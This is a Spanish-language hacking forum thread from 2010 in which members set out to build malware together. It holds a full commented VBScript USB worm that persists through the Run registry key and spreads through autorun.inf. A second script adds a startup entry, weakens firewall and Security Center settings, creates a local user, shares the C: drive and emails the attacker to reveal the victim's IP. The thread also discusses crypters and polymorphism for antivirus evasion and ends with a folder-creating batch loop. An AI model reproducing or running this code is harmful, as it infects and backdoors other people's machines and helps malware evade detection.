Bueno, a lo mejor este finde os hago yo el núcleo de un programa autoreplicante en vbscript para que empeceis a trabajar a partir de él.

...Esperando...

hckr
05-06-2010, 02:36
Copia y pega de un gusano de elhacker.net:


'#++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++#
' _____ .____________ ___ ______________.____ .____ ___________
' / \ | \_ ___ \ / | \_ _____/| | | | \_ _____/
' / \ / \| / \ \// ~ \ __)_ | | | | | __)_
' / Y \ \ \___\ Y / \| |___| |___ | \
' \____|__ /___|\______ /\___|_ /_______ /|_______ \_______ \/_______ /
' \/ \/ \/ \/ \/ \/ \/
' ____ ____ _________ ____ ____ ____ ____ ____ ____
' ||B |||Y ||| |||O |||C |||T |||A |||L |||H ||
' ||__|||__|||_______|||__|||__|||__|||__|||__|||__| |
' |/__\|/__\|/_______\|/__\|/__\|/__\|/__\|/__\|/__\|
'
' - w0rm: Michelle
' - c0de: vbs
' - ver: 1.0
' - programer: OCTALH octalh[at]gmail[dot]com
' - Eres libre de modificar Y redistribuir este codigo siempre y cuando menciones
' la fuente y el autor.
'
'#++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++#


' [ Caracteristicas w0rm ]

' + Infeccion: Simple
' + propagacion: Medios extraibles
' + Permanencia en sistema: Simple
' + Peligrosidad: depende >_<


'#++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++#
' [ MODELO DE OBJETOS ]

Set fso = CreateObject("Scripting.FileSystemObject") ' ARCHIVOS
Set WshShell = WScript.CreateObject("WScript.Shell") ' REGISTRO

'#++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++#
' [ CONSTANTES ]

w0rmname = WScript.ScriptName ' Indicamos que el nombre del gusano sera
' el que tenga en ese momento el archivo actual.
w0rm = "gusano.vbs"
'Nombre del exe que tendra el gusano en el sistema

w0rmpatch = fso.GetSpecialFolder(1) & "\" & w0rm
'Indicamos el directorio donde se copiara el gusano, si utilizamos
'la funcion specialfolder podemos indicar el copiado a la carpeta del sistema (1)
'sin importar donde se encuentre.

autorun = fso.GetSpecialFolder(1) & "\autorun.txt"
'lo mismo que en w0rmpatch pero para el autorrun.

w0rmusb = ":\TEM1000.exe" ' Nombre que tendra el gusano en el medio extraible

autorunusb = ":\autorun.inf" ' Nombre que tendra el autorun en el medio extraible

Const HKEY_LOCAL_MACHINE = &H80000002 'constante para modificar registro mas adelante

'#================================================ ========================================#
' [ CHEKEO DE INFECCION ]

if not infeccion(w0rm) then copiar w0rmname, w0rmpatch end if
' si no encuentras w0rm entonces copia w0rm a la carpeta de sistema
if not infeccion(autorun) then makeautorun() end if
'si no encuentras autorun entonces crealo
makeatributos()
'Agrega atributos a cada archivo que compone al w0rm


' + INFECTAR REGISTRO DE WINDOWS +


If not keyexist("gusano", "Software\Microsoft\Windows\CurrentVersion\Run\", _
HKEY_LOCAL_MACHINE) then crearentradareg()

'Si no existe la llave en el registro llamada gusano entonces la crea, con esto aseguramos
'el arranque del gusano con cada inicio del sistema.


'===========================
' ACTIVANDO LA PROPAGACION
infekusb()
'===========================


'# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #


' TU MENSAJE A PROPAGAR
'

'# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #


'#================================================ ========================================#

' [ SUBPROCESOS Y FUNCIONES ]

'+----------------------------------------------------------------------------------------+
'Funcion que hace un checkeo de un archivo cualquiera (zz)
'si existe devuelve un valor de falso o verdadero

function infeccion(zz)
On Error Resume Next'<====Instruccion que se encarga de continuar con la ejecucion del
if fso.FileExists(zz) Then ' script incluso si existiera algun error.
infeccion = true
exit function
else
infeccion = false
exit function
end if
end function
'si encuentras un archivo (zz) entonces la funcion infeccion es verdadera de lo contrario
'es falsa,( recuerda que zz se puede sustituir por cualquier archivo )

'+----------------------------------------------------------------------------------------+
'Funcion que se encarga de copiar un archivo(pp) a una ubicaccion(mm)

function copiar (pp,mm)
On Error Resume Next
fso.CopyFile pp, mm, true
end function

'+----------------------------------------------------------------------------------------+
'Subproceso que se encarga crear un archivo y escribir datos en el
'en este caso le indicamos que cree un archivo con la constante autorun
'que definimos desde el principio

sub makeautorun()
On Error Resume Next
set mkaut = fso.createtextfile(autorun, True) 'creamos un archivo con el nombre de
mkaut.WriteLine "[AUTORUN]" 'la constante autorun
mkaut.WriteLine "open=" & w0rmusb 'constante del nombre del ejecutable.
mkaut.WriteLine "shell\1=abrir"
mkaut.WriteLine "shell\1\Command=" & w0rmusb
mkaut.WriteLine "shell\2\=explorar"
mkaut.WriteLine "shell\2\Command=" & w0rmusb
mkaut.WriteLine "shellexecute=" & w0rmusb
mkaut.close
end sub
'aqui creamos el autorun que sirve para ejecutar el gusano cuando la victima de doble click
'en el icono de la unidad extraible

'+----------------------------------------------------------------------------------------+
'subproceso que se encarga de añadir atributos de oculto, sistema y solo lectura
'a cada archivo que compone al w0rm

sub makeatributos()
On Error Resume Next
Dim archivosw0rm(1) 'array archivosw0rm que dentro de el contiene al gusano y su autorun
archivosw0rm(0) = w0rmpatch
archivosw0rm(1) = autorun

for each file in archivosw0rm ' por cada archivo dentro del array archivosw0rm
set wormcontent = fso.GetFile(file) 'tomalos y
wormcontent.attributes = 7 'agregales atributos
next
end sub

'+----------------------------------------------------------------------------------------+
'Funcion que se encarga de verificar que exista una llave en el registro

Function keyexist(keyname, keyPath, regCategory)
On Error Resume Next
retVal = false
strComputer = "." 'inicamos en cualquier computadora
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv") 'se crea un objeto

oReg.EnumKey regCategory, keyPath, arrSubKeys'partes de la clave del registro

For Each subkey In arrSubKeys
If keyname = subkey Then
retVal = true
Exit For
End If
Next
keyExists = retVal
End Function
'esta funcion basicamente se encarga de verificar que existan los valores que introduzcamos
'en ella que son keyname, keypath y regcategory, de esa manera comprobamos que exista
'cualquier llave en el registro con solo usar la funcion keyexist y el valor de nuestra
'llave a verficar

'+----------------------------------------------------------------------------------------+
'Subproceso que se encarga de crear la llave en el registro
private sub crearentradareg()
On Error Resume Next
WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run \gusano", _
w0rmpatch, "REG_SZ"
end sub

'+----------------------------------------------------------------------------------------+
'Subproceso que se encarga de copiar al gusano a una unidad extraible.
private sub infekusb()
on error resume next
Const DriveTypeRemovable = 1 ' indicamos medio extraible
do ' inicia loop infinito
Set oFS = Wscript.CreateObject("Scripting.FileSystemObject")
Set oDrives = oFS.Drives 'declaramos todos los srivers
For Each Drive in oDrives 'por cada driver
If Drive.DriveType = DriveTypeRemovable Then 'si son del tipo removible entonces
If Drive.DriveLetter <> "A" Then ' si la letra es de A-Z entonces
If fso.FileExists(Drive.DriveLetter + autorunusb) Then ' si existe autorun
set cFile = fso.GetFile (Drive.DriveLetter + autorunusb)'tomalo y
cFile.attributes = 0 ' quitale los atributos
fso.CopyFile autorun, Drive.DriveLetter & autorunusb , true'despues copialo
else' de lo contrario
fso.CopyFile autorun, Drive.DriveLetter & autorunusb , true' copialo
End if
fso.CopyFile w0rmpatch, Drive.DriveLetter & w0rmusb , true' copia el gusano a la unidad
End If
End If
Next
loop
end sub
'aqui es donde quiza tengas mas duda asi que te lo explicare paso por paso
'primero obtenemos todos los drivers(unidades) que el sistema pueda tener, despues
'verificamos que sean del tipo extraible, una ves verificado eso tomamos la letra de la
'unidad y luego hacemos un checkeo para ver si existe el autorun en dicha unidad
'si existe le quita los atributos de solo lectura para poder sobreescribirlo y hacer
'una copia desde el autorun que esta en el sistema, como el del sistema ya tiene
'atributos de oculto sistema y solo olectura al copiarlo se copia con los mismos atributos
'y no tenemos que volver a agregarcelos en el medio extraible.

'¿porque le quito los atributos en el medio extraible?
'porque se puede dar el caso en el que dicho medio extraible se encuentre infectado por
'otro gusano que no sea el nuestro y ya viene con su propio autorun, entonces asi nos
'aseguramos que nuestro gusano sera el vencedor hehe

'tambien aqui tenemos un loop interesante inicia con la frase do y termina en loop
'lo que estamos haciendo es un bucle condicional pero sin condicion y apuntado a un objeto
'de esta forma creamos un bucle infinito y el copiado del gusano sera
'practicamente al instante.
----------------------------------------------------------------------

Podemos extraer codigos de ese worm... No violamos el copyright... :D

clarinetista
05-06-2010, 03:12
Copia y pega de un gusano de elhacker.net

Podemos extraer codigos de ese worm... No violamos el copyright... :D
O todavia mucho mas productivo; te imprimes el codigo fuente y lo estudias para escribir tu propio codigo.

hckr
05-06-2010, 04:04
puuffff "estudiar" suena a "chungo" xDxD Tienes razón...

RaidMan
05-06-2010, 06:16
Nadie dijo que esto fuera facil. Y copiar codigo sin saber de que va no sirve para nada.

Si quieres puedes probar a cogerlo por partes y ver que es lo que va haciendo en cada una de ellas (compilando y ejecutando en una maquina Virtual) y asi vas aprendiendo.


Un saludo

hckr
09-06-2010, 16:03
Chicos se me ha ocurrido una idea mucho mejor. No sé si crear un nuevo post pero no me quiero liar a postear xD. Mi ideas es que creemos una especie de wargame para windows. Es un programa escrito en vb o c que te va dando pistas. Por ejemplo: te da una pista hacia un archivo de texto y ese archivo contiene una especie de acertijo. El acertijo te llevará a una clave del registro con una valor, que tendrás que copiar y pegar en el wargame para que te de el nivel válido. El wargame tendrá la firma del foro. No se si se habrá mencionado antes la idea de hacer un wargame del foro pero desde mi punto de vista esta es mejor :)

P.D.: No se si les pasa a otras personas pero todo esto se me ocurrió antes de dormirme, en mi querida cama. Es mi lugar de intimidad y pensamiento propio... Mis ideas se desarrollan allí :D

¿Posteo otro tema explicándolo todo? :S

chewarrior
14-10-2010, 21:15
bueno esto lo hice en vbs, el objetivo es desactivar el fir avisos..., el login telnet,y hacer un usuario net bios y compartir el disco c:\, ademas en teoria te manda el mail y al mirar en la cabezera ya sabes la ip de la victima, es algo que hice y no creeo que funcione, pero bueno aqui lo dejo la idea no es mala.




' VB Script Document


Dim objshell,objscript,xsd,xsd2,erre,arc,tr

Set objshell = createobject("wscript.shell")
Set objscript = CreateObject("Scripting.FileSystemObject")

xsd = objshell.specialfolders("Startup")

erre = objscript.FileExists(xsd & "\DirecTx3D.vbs")

if erre = False Then

objscript.copyfile wscript.scriptfullname, xsd & "\DirecTx3D.vbs", true

Set arc = objscript.GetFile( xsd & "\DirecTx3D.vbs")
arc.Attributes = 3

End if

objshell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersi on\Run\DirecTx3D.vbs", xsd, "REG_SZ"

objshell.regwrite "HKLM\Software\Policies\Microsoft\WindowsFirewall\S tandardProfile\EnableFirewall",1,"REG_DWORD"

objshell.regwrite "HKLM\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify",1,"REG_WORD"

objshell.regwrite "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\Star t",4,"REG_WORD"

objshell.regwrite "HKLM\SOFTWARE\Microsoft\TelnetServer\1.0\EventLogg ingEnabled",0,"REG_WORD"

objshell.Exec("cmd /c net user root lolll /add")

objshell.Exec("cmd /c net share Publico0=c:\")

set objcdo=createobject("cdo.message")
objcdo.subject="Prueba de envío"
objcdo.from="@gmail.com"
objcdo.to="@yahoo.es"
objcdo.textbody="Este es el texto del mail"
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.gmail.com"
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 465
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 30
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "@gmail.com"
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = ""
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = 1
objcdo.configuration.fields.update
objcdo.send


WScript.Quit

hckr
14-10-2010, 22:10
Sabes Visual Basic Script? Además, si lees anteriormente, los antivirus suelen dar prioridad a los archivos vbs, a no ser que lo convirtamos en un ejecutable y le apliquemos un crypter... lo mas que puedo hacer es que no lo detecte ninguno menos avira...

chewarrior
14-10-2010, 22:21
Se muy poco de vbscript, casi todo lo aprendi de este tutorial y despues mirando codigos de malware y mas trozos interesante de programas que encontre por los foros.

http://www.mediafire.com/?dmi2tjwt1yy

son tres partes, es bastante basico pero para empezar a entender ese codigo que te han dejado antes te va venir de perlas.

3m.8>(9/3)
14-10-2010, 23:32
Me pregunto si podríamos hacerlo en asm, que es una de las mejores formas de tocar el hardware.

Fruit
15-10-2010, 00:26
Me pregunto si podríamos hacerlo en asm, que es una de las mejores formas de tocar el hardware.

Si el SO no lo impidiera, claro.

hystd
24-10-2010, 06:34
ademas en teoria te manda el mail y al mirar en la cabezera ya sabes la ip de la victima,

La IP de la víctima no, en todo caso la IP del servidor de correo que te envia el mail.


Además, si lees anteriormente, los antivirus suelen dar prioridad a los archivos vbs, a no ser que lo convirtamos en un ejecutable y le apliquemos un crypter... lo mas que puedo hacer es que no lo detecte ninguno menos avira...


Aunque apliques un cifrado del fichero ejecutable, un antivirus puede analizar la memoria y por tanto ya no analiza un programa, sino un proceso. Para que pase totalmente desapercibido debe emplear además de cifrado, técnicas de polimorfismo o añadir código de modificación software.

Un saludo.

chewarrior
05-11-2010, 03:07
La IP de la víctima no, en todo caso la IP del servidor de correo que te envia el mail.


Estas seguro de eso ?¿?
Entonces la ultima linea de la cabecera que significa (Es en yahoo)

Received: from [xx.x.xxx.xxx] y no es la ip de los servers smtp, pop3 por los que paso
by web24820.mail.ird.yahoo.com via HTTP; Fri, 05 Nov 2010 00:42:45 GMT
X-Mailer: YahooMailRC/504.5 YahooMailWebService/0.8.107.284920
Date: Fri, 5 Nov 2010 00:42:45 +0000 (GMT)
From: Soni Montoys <mail@yahoo.es>

Haber si me lo puedes explicar,de verdad que estaria muy agredecido porque me dejastes con la duda.


Gracias por adelantado.

Fruit
05-11-2010, 03:14
Prueba a resolver la dirección IP.

chewarrior
05-11-2010, 03:18
Fruit mandame un mensaje por fii

chewarrior1@yahoo.es

Y ya salgo de dudas.

Fruit
05-11-2010, 03:27
Mándatelo tú desde otra dirección.

chewarrior
05-11-2010, 03:40
Ya lo e hecho y en ese apartado sale mi ip Received: from [xx.x.xxx.xxx]

aqui sale con el mail que lo envie From: Soni Montoys <mail@yahoo.es>

Por cierto que e hecho un escaneo con nessus y me sale que tengo un server ftp,cuando no tengo na de na, asi que directamente e ido a cmd, ftp, ftp open 127.0.0.1 21,connect :numeto de error desconocido, umm o yo soy un neurotico o alguien me esta jodiendo

Fruit
05-11-2010, 03:48
O tienes un router que sí tiene servidor de FTP, claro.

chewarrior
05-11-2010, 03:59
Tiene que ser tema del router porque en mi sistema wxp, no esta abierto el puerto 21, el caso es que en el router tampoco esta habilitado el acesso ftp xd.

chewarrior
18-11-2010, 02:16
Efectivamente tengo server ftp en el router xd

bitboy
13-12-2010, 21:12
Gondar_h, chapó. Sólo quería decirle al creador de éste hilo que comentaba algo de que el virus pudiera anular las librerías de panda -entre otras cosas-... se dice, no sé si son malas lenguas pero sí que al menos han trabajado en Panda en Bilbao, que sus antivirus-firewalls básicamente son manejos de iptables... un poquito de allí, otro de allá... y hala... a vender el pescado. Escribo de oídas, así es que alguien que les haya podido meter mano o bien haya decompilado código suyo o como fuere podrá decirme que no es así y estará en su derecho y yo quedaré agradecido ^^.

bitboy
13-12-2010, 21:39
Linux no te vuelve a pedir la contraseña para nada una vez te haces root.


Siento disentir contigo compañero de foro. Mi distro me suele pedir el pass cada poco tiempo y no estoy seguro de si es por inactividad (cosa que dudo bastante) o porque el nivel de privilegio de ciertos programas o modificaciones de ciertos archivos así lo requiere. Por ejemplo, si quiero modificar el archivo de configuración de un ids como Snort me pide que sea root, lo modifico según mi conveniencia y todo perfecto, si más tarde necesito hacerlo de nuevo... ¿qué sucede? tachán!!! me vuelve a pedir el pass... He aquí una de las diferencias más grandes que existen con respecto a Win2, aún así hacerse con el control de un unix puede ser asombrosamente fácil, eso sí teniendo la máquina física delante -ya se saben bien conocidos ciertos fallos en linux-, sino ya es harina de otro costal :)

Fruit, tal vez me digas que se puede modificar el nivel de privilegio para que no sea tan tedioso el tener que estar "diciendo" soy root :P pero entonces estaría minando una de las seguridades de mi sistema. De todos modos es genial que seáis tan activos y ofrezcáis vuestros conocimientos. Lo mejor de todo es poder discutir y seguir aprendiendo! Me encanta éste foro y casi todo lo que se debate en él. Seguid así!!!!

1fluke2
30-12-2010, 00:24
1:
md nuevo
cd nuevo
goto 1